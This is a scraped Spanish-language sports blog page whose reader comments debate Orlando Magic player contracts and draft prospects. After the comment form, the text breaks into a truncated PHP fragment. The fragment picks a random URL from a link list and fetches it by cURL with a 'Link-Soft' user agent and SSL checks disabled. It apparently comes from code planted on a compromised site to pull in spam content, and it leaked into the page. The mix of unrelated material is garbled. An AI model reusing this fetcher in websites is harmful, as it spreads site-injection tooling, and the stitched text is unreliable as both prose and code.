    los contratos de afflalo y davis entran en la volteada por ser largos, pero son bajos y su rendimiento es de lo mejor del equipo

    si orlando pudiera limpiarse de otros contratos, afflalo, davis y vuceic deberian ser las guias de nicholson, harkless y algunos de los jugadores que pillen en el proximo draft

    me gusta mohammad, noel, anthony bennet o mcadoo

      Citar

  43. Denise dice:
    #43

    Esteban: afflalo y su contrato no es el problema de orlando, al contrario, es un exelente conmtratao dado su rendimientoel problema de orlando son los contratos de turkoglu, harrington, nelson, richarson y sobretodo la plata que le estan pagando a arenaslos contratos de afflalo y davis entran en la volteada por ser largos, pero son bajos y su rendimiento es de lo mejor del equiposi orlando pudiera limpiarse de otros contratos, afflalo, davis y vuceic deberian ser las guias de nicholson, harkless y algunos de los jugadores que pillen en el proximo draftme gusta mohammad, noel, anthony bennet o mcadoo

    A Nelson no me lo toques!! jaja

    Nelson está haciendo una gran campaña…es el lider dentro y fuera del equipo, el alma de la plantilla, no se le puede reprochar nada. Además su ultimo año de contrato en 2015 es una Team Option.
    El dinero a Arenas no influye directamnete porque está amnistiado y eso no cuenta en el limite salarial

      Citar

  44. nba dice:
    #44

    Lo que hay que ver es si alguien quiere acabar en Orlando,
    Despues de las ultimas declaraciones de D’Antoni me da a mi que Pau tiene las horas contadas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>